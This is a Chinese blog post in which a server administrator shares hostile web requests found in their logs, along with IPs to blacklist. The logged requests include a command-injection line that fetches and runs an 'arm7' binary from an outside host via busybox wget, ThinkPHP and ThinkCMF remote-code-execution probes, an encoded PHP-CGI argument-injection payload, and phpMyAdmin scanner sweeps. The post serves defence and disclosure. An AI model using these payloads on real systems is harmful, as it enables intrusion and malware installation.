分享查日志发现的php web请求攻击

2020年8月26日 更新黑名单IP列表

前些天闲着无聊,看看服务器的请求日志。真是不看不知道,一看吓一跳!

来自各地的攻击请求比访问请求多好多……

虽说限于黑客水平没造成有效攻击,但小编还是决定做一点事情。比如:将恶意IP加黑名单,写文纪念下有黑客攻击的日子。

记得上一次发现异常,是在大约一年前服务器CPU占用100%的时候。细节遗忘,只记得杀进程关端口,粗略处理后便OK了。

本文将请求来源IP及请求贴出来,方便路过的朋友加以防范。

IP

183.192.179.16 182.254.52.17 14.18.182.223  61.241.50.63 139.162.88.63
47.108.80.103 111.206.250.230 111.206.250.229 111.206.250.198 93.174.93.143
193.112.246.211 216.244.66.202 182.254.52.17 89.154.165.167 41.42.113.174 
51.254.111.118 61.162.213.225 123.185.198.200 139.199.184.166 132.145.136.225 185.142.236.34 185.234.217.231 115.238.89.35 115.236.45.236 103.85.86.195 156.225.14.140 115.236.172.148 103.93.252.117 185.142.236.34 182.88.233.222 106.45.0.117 5.188.86.218 180.76.170.52 218.95.182.135
115.236.45.236 195.54.160.21

对于这些IP,可以直接加黑名单。或许有些IP是被利用,但一并连坐。

请求


/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a

http:// xxx:xxx:xxx:xxx//myadmin/scripts/setup.php
http:// xxx:xxx:xxx:xxx//phpmyadmin/scripts/setup.php
http:// xxx:xxx:xxx:xxx/phpmyadmin/scripts/setup.php
http:// xxx:xxx:xxx:xxx/pma2011/scripts/setup.php
http:// xxx:xxx:xxx:xxx/muieblackcat

92.118.161.33 - - [29/Mar/2020:05:48:22 +0800] "GET / HTTP/1.1" 200 17899 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"

http:// xxx:xxx:xxx:xxx/thinkphp/html/public/index.php
http:// xxx:xxx:xxx:xxx/TP/index.php 
http:// xxx:xxx:xxx:xxx/TP/public/index.php
http://clientapi.ipip.net/echo.php?info=1234567890
http:// xxx:xxx:xxx:xxx/portal/redlion

POST 
/boaform/admin/formPing
http://5.188.210.101/echo.php
http://xunsu.online/server-status
/data/admin/allowurl.txt
/xd.php
/robots.txt
http:// xxx:xxx:xxx:xxx/Report.docx 
http://clientapi.ipip.net/echo.php?info=1234567890
/solr/admin/info/system?wt=json
/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>
/?XDEBUG_SESSION_START=phpstorm
/HNAP1/
/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
/statics/css/crop.css
/js/index.js
/public/simpleboot/css/simplebootadmin.css
/js/tc.js HTTP/1.1
/public/js/image.js
/wangdafa
http:// xxx:xxx:xxx:xxx/hudson
http://xunsu.online/xd.php
/hazelcast/rest/cluster
/index.php?s=/index/
/myadmin/scripts/db___.init.php
/plugins/weathermap/editor.php
/weathermap/editor.php
/Joomla/

93.174.93.143 - - [15/Mar/2020:03:26:28 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:28 +0800] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 226 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:29 +0800] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 226 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:30 +0800] "GET /mysqladmin/scripts/setup.php HTTP/1.1" 404 226 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:32 +0800] "GET /PMA2012/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:32 +0800] "GET /pma2012/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:32 +0800] "GET /PMA2011/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:33 +0800] "GET /pma2011/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:33 +0800] "GET /PMA2013/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:34 +0800] "GET /pma2013/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:34 +0800] "GET /PMA2014/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:35 +0800] "GET /pma2014/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:35 +0800] "GET /PMA2015/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:35 +0800] "GET /pma2015/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:36 +0800] "GET /PMA2016/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:36 +0800] "GET /pma2016/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:37 +0800] "GET /phpmyadmin2/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:37 +0800] "GET /phpmyadmin3/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:37 +0800] "GET /phpmyadmin4/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:38 +0800] "GET /phpmyadmin5/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:38 +0800] "GET /phpmyadmin6/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:39 +0800] "GET /phpmyadmin7/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:40 +0800] "GET /pma/scripts/setup.php HTTP/1.1" 404 219 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:40 +0800] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:41 +0800] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:42 +0800] "GET /mysql/scripts/setup.php HTTP/1.1" 404 221 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:43 +0800] "GET /phpMyAdmin-2.10.0.0/scripts/setup.php HTTP/1.1" 404 235 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:44 +0800] "GET /phpMyAdmin-2.11.11/scripts/setup.php HTTP/1.1" 404 234 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:44 +0800] "GET /phpMyAdmin-2.11.11.3/scripts/setup.php HTTP/1.1" 404 236 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:45 +0800] "GET /phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php HTTP/1.1" 404 248 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:45 +0800] "GET /dbadmin/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:49 +0800] "GET /scripts/setup.php HTTP/1.1" 404 215 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:49 +0800] "GET /phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 228 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:49 +0800] "GET /mysql/scripts/setup.php HTTP/1.1" 404 221 "-" "ZmEu"

POST
/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E

仔细观察以上请求,不难发现攻击主要分为两类,一类是针对PMA的,另一类是遍历thinphp、WordPress等开源框架和开源CMS系统的已知存在bug的文件。稍作防范,即可防御大部分攻击。

版权声明

弈心博客


本文首发site_name,转载请附上博文链接!